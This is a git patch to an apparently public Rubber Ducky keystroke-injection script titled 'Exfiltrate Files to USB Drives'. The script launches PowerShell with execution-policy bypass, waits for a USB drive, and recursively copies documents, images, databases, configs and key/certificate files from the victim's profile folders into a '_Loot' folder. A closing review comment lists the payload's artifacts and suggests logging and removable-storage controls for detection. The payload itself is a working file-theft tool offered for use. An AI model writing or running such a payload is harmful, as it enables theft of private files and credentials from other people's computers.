From f6e38212ec3b7133af20ba1e367549808066015c Mon Sep 17 00:00:00 2001
From: egieb <93350544+beigeworm@users.noreply.github.com>
Date: Mon, 18 Dec 2023 22:58:25 +0000
Subject: [PATCH] Update Exfiltrate Files to USB Drives.txt

---
 OSINT/Exfiltrate Files to USB Drives.txt | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/OSINT/Exfiltrate Files to USB Drives.txt b/OSINT/Exfiltrate Files to USB Drives.txt
index b0b631f..edd11bb 100644
--- a/OSINT/Exfiltrate Files to USB Drives.txt
+++ b/OSINT/Exfiltrate Files to USB Drives.txt
@@ -1,8 +1,11 @@
-REM Title: Exfiltrate files to Removable Drives
+REM Title: Exfiltrate files to Removable Drive
 REM Author: @beigeworm
-REM Description: This Script finds all USB drives and attempts to copy many user files to them. (searches user folders for pictures, video, text files etc..)
+REM Description: Waits for a new USB Storage device to be connected and then copies many user files to that USB drive
 REM Target: Windows 10 and 11
 
+REM 1. Run this script.
+REM 2. Connect your USB drive
+
 REM some setup for dukie script
 DEFAULT_DELAY 100
 
@@ -11,5 +14,5 @@ DELAY 750
 STRING powershell -NoP -Exec Bypass
 ENTER
 DELAY 4000
-STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };if($removableDrives.Length -eq 0){Write-Host "No Removable Drives Found.. Exiting";break}foreach($drive in $removableDrives){$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if(-not(Test-Path -Path $destinationPath)){New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach($folder in $foldersToSearch){Write-Host "Searching in $folder";foreach($extension in $fileExtensions){$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach($file in $files){$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete."};exit
-ENTER
\ No newline at end of file
+STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };$count = $removableDrives.count;Write-Host "Connect a USB Drive.";While ($count -eq $removableDrives.count){$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };sleep 1};$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1;$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if (-not(Test-Path -Path $destinationPath)) {New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach ($folder in $foldersToSearch) {Write-Host "Searching in $folder";foreach ($extension in $fileExtensions) {$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach ($file in $files) {$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete.";exit
+ENTER
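Review bot: The rewritten `STRING` line is documented only by the two usage steps in the header, so nothing on the page records what the payload does to the host, and anyone reviewing it or building a detection has to unpick the one-liner. Visible in this hunk are a console started with `powershell -NoP -Exec Bypass`, a once-a-second `Get-WmiObject Win32_LogicalDisk` poll filtered on `DriveType -eq 2`, and recursive copies from six user-profile folders into `<drive>\<COMPUTERNAME>_Loot`. I would add a header line such as `REM Artifacts: powershell -NoP -Exec Bypass console; 1 s Win32_LogicalDisk polling; <drive>\<COMPUTERNAME>_Loot folder on the removable drive`. On a monitored host these should surface in process command-line auditing and PowerShell script-block logging, and a removable-storage write-deny policy should stop the copy step; this is inferred from the commands shown, not tested.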